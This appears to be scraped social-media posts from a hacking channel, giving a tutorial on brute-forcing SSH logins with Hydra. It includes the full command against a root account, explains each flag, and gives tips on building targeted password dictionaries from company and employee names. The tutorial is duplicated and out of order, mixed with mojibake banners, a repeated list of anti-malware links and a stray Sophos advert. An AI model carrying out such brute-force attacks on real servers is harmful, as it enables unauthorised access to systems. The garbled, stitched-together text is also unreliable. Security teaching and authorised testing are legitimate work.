# hydra -s 22 -l root -P / usr / share / wordlists / fasttrack .txt 192.168.1.1 -t 4 ssh
3) Now let's analyze it:
- s - The flag indicates the port. It is worth noting that administrators can replace the default port 22 for the ssh service , in order to find out on which port the service is running, it is necessary to perform an initial scan of the target using the Nmap tool . We wrote about how to do this earlier in the article .
- l - the flag indicates the login, in our example we use root and admin. (we can provide a link to the dictionary here)
- P - the flag indicates the password, in our case we use the fasttrack .txt dictionary from the kali distribution , which is located in the / usr / share / wordlists / directory
4) It is worth noting that in order to effectively carry out a brute-force attack, it is worth paying due attention to the preparation of the dictionary, namely: taking into account geographical and linguistic peculiarities, including in the dictionary the name of the company, the names of its subsidiaries, the names of the operating services and applications, the names of employees, etc.
192.168.1.1 - ip address of the target, since the target we are using has a white ip, it is smeared
- t - the flag indicates the number of simultaneously used threads. We indicate 4
ssh - used protocol
5) Based on the results of the team's work, we see that the passwords from the dictionary did not fit for the admin and root logins
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Brute SSH the remote server :
1) For brute-force attacks (brute-force attacks), we will use the Hydra tool , which is included with the Kali Linux distribution. SSH is present on any Linux or Unix server and is generally the primary use for administrators to access and control their systems.
Warning: Hydra is an attack tool
β Use it only on your own systems and networks unless you have written permission from the owner. Otherwise, it is illegal . "
2) To implement the attack, use the command:
# hydra -s 22 -l root -P / usr / share / wordlists / fasttrack .txt 192.168.1.1 -t 4 ssh
3) Now let's analyze it:
- s - The flag indicates the port. It is worth noting that administrators can replace the default port 22 for the ssh service , in order to find out on which port the service is running, it is necessary to perform an initial scan of the target using the Nmap tool . We wrote about how to do this earlier in the article .
- l - the flag indicates the login, in our example we use root and admin. (we can provide a link to the dictionary here)
- P - the flag indicates the password, in our case we use the fasttrack .txt dictionary from the kali distribution , which is located in the / usr / share / wordlists / directory
4) It is worth noting that in order to effectively carry out a brute-force attack, it is worth paying due attention to the preparation of the dictionary, namely: taking into account geographical and linguistic peculiarities, including in the dictionary the name of the company, the names of its subsidiaries, the names of the operating services and applications, the names of employees, etc.
192.168.1.1 - ip address of the target, since the target we are using has a white ip, it is smeared
- t - the flag indicates the number of simultaneously used threads. We indicate 4
ssh - used protocol
5) Based on the results of the team's work, we see that the passwords from the dictionary did not fit for the admin and root logins
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SINCE LINUX IS A GOOD target BY HACKERS IN 2020
INSTALL 1 FROM THOSE ANTI-MALWARES & FIREWALLS :
https://www.clamav.net/
https://secure2.sophos.com/en-us/products/free-tools.aspx
https://firejailtools.wordpress.com/
http://rkhunter.sourceforge.net/
https://www.qubes-os.org/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SINCE LINUX IS A GOOD target BY HACKERS IN 2020
INSTALL 1 FROM THOSE ANTI-MALWARES & FIREWALLS :
https://www.clamav.net/
https://secure2.sophos.com/en-us/products/free-tools.aspx
https://firejailtools.wordpress.com/
http://rkhunter.sourceforge.net/
https://www.qubes-os.org/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
SOPHOS
Cybersecurity as a Service Delivered | Sophos
We Deliver Superior Cybersecurity Outcomes for Real-World Organizations Worldwide with a Broad Portfolio of Advanced Security Products and Services.